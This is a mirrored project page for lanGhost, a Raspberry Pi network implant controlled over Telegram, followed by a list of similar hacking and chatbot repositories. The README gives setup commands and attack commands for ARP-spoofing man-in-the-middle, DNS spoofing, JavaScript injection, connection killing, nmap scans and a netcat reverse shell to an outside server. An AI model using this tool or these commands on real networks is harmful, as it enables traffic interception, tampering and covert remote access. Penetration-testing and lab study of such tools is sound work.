All Projects → xdavidhu → Langhost

xdavidhu / Langhost

Licence: mit
👻 A LAN dropbox chatbot controllable via Telegram

Programming Languages

python
139335 projects - #7 most used programming language

Projects that are alternatives of or similar to Langhost

Lyncsmash
locate and attack Lync/Skype for Business
Stars: ✭ 258 (-20.37%)
Mutual labels:  hacking, pentesting
Airgeddon
This is a multi-use bash script for Linux systems to audit wireless networks.
Stars: ✭ 3,830 (+1082.1%)
Mutual labels:  hacking, pentesting
Dumpall
一款信息泄漏利用工具,适用于.git/.svn源代码泄漏和.DS_Store泄漏
Stars: ✭ 250 (-22.84%)
Mutual labels:  hacking, pentesting
Python-BlackJackBot
A Telegram bot written in Python to play the game BlackJack alone or with your friends
Stars: ✭ 48 (-85.19%)
Mutual labels:  telegram, chatbot
Vajra
Vajra is a highly customizable target and scope based automated web hacking framework to automate boring recon tasks and same scans for multiple target during web applications penetration testing.
Stars: ✭ 269 (-16.98%)
Mutual labels:  hacking, pentesting
QlikBotNet
Qlik Bot Net is an example chat bot which enables access to Qlik content via conversational analytics. It's built in .NET/C# and can be used with the Telegram messaging platform.
Stars: ✭ 20 (-93.83%)
Mutual labels:  telegram, chatbot
Cloudbrute
Awesome cloud enumerator
Stars: ✭ 268 (-17.28%)
Mutual labels:  hacking, pentesting
Bot
Telegram Chatbot Assistant for Managing Club Activities
Stars: ✭ 208 (-35.8%)
Mutual labels:  chatbot, telegram
Osint tips
OSINT
Stars: ✭ 322 (-0.62%)
Mutual labels:  hacking, pentesting
Phishapi
Comprehensive Web Based Phishing Suite for Rapid Deployment and Real-Time Alerting!
Stars: ✭ 272 (-16.05%)
Mutual labels:  hacking, pentesting
technopsyna
телеграм бот для техноконфы
Stars: ✭ 16 (-95.06%)
Mutual labels:  telegram, chatbot
Whatweb
Next generation web scanner
Stars: ✭ 3,503 (+981.17%)
Mutual labels:  hacking, pentesting
Python Telegram Bot
We have made you a wrapper you can't refuse
Stars: ✭ 17,209 (+5211.42%)
Mutual labels:  chatbot, telegram
messaging-apis
Messaging APIs for multi-platform
Stars: ✭ 1,759 (+442.9%)
Mutual labels:  telegram, chatbot
Urban Bot
🤖 The universal chatbot library based on React. Write once, launch Telegram, Facebook, Slack, ... every messenger with chatbots
Stars: ✭ 223 (-31.17%)
Mutual labels:  chatbot, telegram
Uptux
Linux privilege escalation checks (systemd, dbus, socket fun, etc)
Stars: ✭ 260 (-19.75%)
Mutual labels:  hacking, pentesting
Transcriberbot
TranscriberBot for Telegram
Stars: ✭ 170 (-47.53%)
Mutual labels:  chatbot, telegram
Flottbot
A chatbot framework written in Go. All configurations are made in YAML files, or inside scripts written in your favorite language.
Stars: ✭ 175 (-45.99%)
Mutual labels:  chatbot, telegram
Crips
IP Tools To quickly get information about IP Address's, Web Pages and DNS records.
Stars: ✭ 272 (-16.05%)
Mutual labels:  hacking, pentesting
Pentest Book
Stars: ✭ 266 (-17.9%)
Mutual labels:  hacking, pentesting

⚠️ Warning! This project is no longer maintained and may not work as excepted.

A LAN dropbox chatbot controllable via Telegram

features:






installation:

warning:

lanGhost is designed for Raspberry Pis (Raspbian/Kali for RPi). Running it on other/desktop distros could cause issues and may not work as excepted.

You will need a Raspberry Pi with fresh Raspbian/Kali on the SD card, because you don't want anything else running in the background.

Boot up the Pi, get an SSH sell or connect a monitor and a keyboard and enter these commands:

$ sudo apt update && sudo apt install python3 python3-pip
$ git clone https://github.com/xdavidhu/lanGhost
$ cd lanGhost
$ sudo ./setup.py

Please read the questions/messages while running the setup script!

step 1/4 - setup.py

[+] Please enter the name of the network interface connected/will
be connected to the target LAN. Default wired interface is 'eth0',
and the default wireless interface is 'wlan0' on most systems, but
you can check it in a different terminal with the 'ifconfig' command.

step 2/4 - setup.py

[+] Please create a Telegram API key by messaging @BotFather on Telegram
with the command '/newbot'.

After this, @BotFather will ask you to choose a name for your bot.
This can be anything you want.

Lastly, @BotFather will ask you for a username for your bot. You have
to choose a unique username here which ends with 'bot'. For
example: xdavidbot. Make note of this username, since later
you will have to search for this to find your bot, which lanGhost
will be running on.

After you send your username of choise to @BotFather, you will recieve
your API key.



step 3/4 - setup.py

[+] Now for lanGhost to only allow access to you, you need to verify yourself.

Send the verification code below TO THE BOT you just created. Just search for your
bot's @username (what you sent to @BotFather) to find it.

[+] Verification code to send: ******

step 4/4 - setup.py

[+] Do you want lanGhost to start on boot? This option is necessary if you are using
this device as a dropbox, because when you are going to drop this device into a
network, you will not have the chanse to start lanGhost remotely! (autostart works
by adding a new cron '@reboot' entry)

If you are ready with the setup just reboot the Pi and lanGhost will start right up!3>

usage:

warnings:

Using lanGhost on a networks bigger than /24 is not recommended because the scans will take too long.

lanGhost is not quiet. Anyone monitoring the traffic can see the ARP packets!

drop it into a network:

If you have selected yes at step 4/4 (autostart) the Pi is fully set up for dropping. lanGhost should start up on boot, and send you a message on Telegram with the text: lanGhost started! 👻.

Make sure to try it out in your lab first and test if lanGhost is responding to your messages!

If you are all set, just connect it to the target network by plugging in the Ethernet cable into the Pi and connecting the power via micro USB and you are ready to go!

(lanGhost can also work over WiFi, but you will need to set up wpa_supplicant to connect to the network automatically first)

available commands:

/scan - Scan LAN network
/scanip [TARGET-IP] - Scan a specific IP address.
/kill [TARGET-IP] - Stop the target's network connection.
/mitm [TARGET-IP] - Capture HTTP/DNS traffic from target.
/replaceimg [TARGET-IP] - Replace HTTP images requested by target.
/injectjs [TARGET-IP] [JS-FILE-URL] - Inject JavaScript into HTTP pages requested by target.
/spoofdns [TARGET-IP] [DOMAIN] [FAKE-IP] - Spoof DNS records for target.
/attacks - View currently running attacks.
/stop [ATTACK-ID] - Stop a currently running attack.
/restart - Restart lanGhost.
/reversesh [TARGET-IP] [PORT] - Create a netcat reverse shell to target.
/help - Display the help menu.
/ping - Pong.

attack system:

You can start an attack by using one of these commands: /kill, /mitm, /replaceimg, /injectjs, /spoofdns

Ater you have one or more attacks running, you can use the /attack command to get a list of them containing the ATTACK-ID's.

To stop an attack type /stop [ATTACK-ID].

reverse shell:

warning:

/reversesh only makes a netcat TCP connection which is not encrypted and all the traffic can be monitored! Only use it for emergency fixes or for setting up an encrypted reverse connection if necessary.

The /reversesh command is for getting a reverse shell on the Pi, when its not accessable from the outside.

To use the /reversesh command you will need to have a server listening for the shell.

Netcat command to start up the listener on your server:

$ nc -l 0.0.0.0 [PORT]

Telegram command:

/reversesh [IP-of-your-listening-server] [PORT]

attacks:

  • /kill - Stops the internet connectivity for the target.
  • /mitm - Captures HTTP and DNS traffic from the target and sends it in text messages.
  • /replaceimg - Replaces HTTP images for the target to what picture you send to the bot.
  • /injectjs - Injects JavaScript into every HTTP HTML response for the target. You need to host the the JS file on your server and give the URL as a parameter.
  • /spoofdns - Spoofs DNS responses for the target.

All attacks use ARP Spoofing!

scans:

  • /scan - Scans the local network and returns the hosts online. Uses nmap -sn scan to discover hosts.
  • /scanip - Scans an IP address for open ports and other info. Uses nmap -sS scan.

notifications:

You will get a message every time when a new device connects/leaves the network.

disclaimer:

I'm not responsible for anything you do with this program, so please only use it for good and educational purposes.

legal:

Copyright (c) 2018 by David Schütz. Some rights reserved.

lanGhost is under the terms of the MIT License, following all clarifications stated in the license file. You can also go ahead and email me at xdavid{at}protonmail{dot}com.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].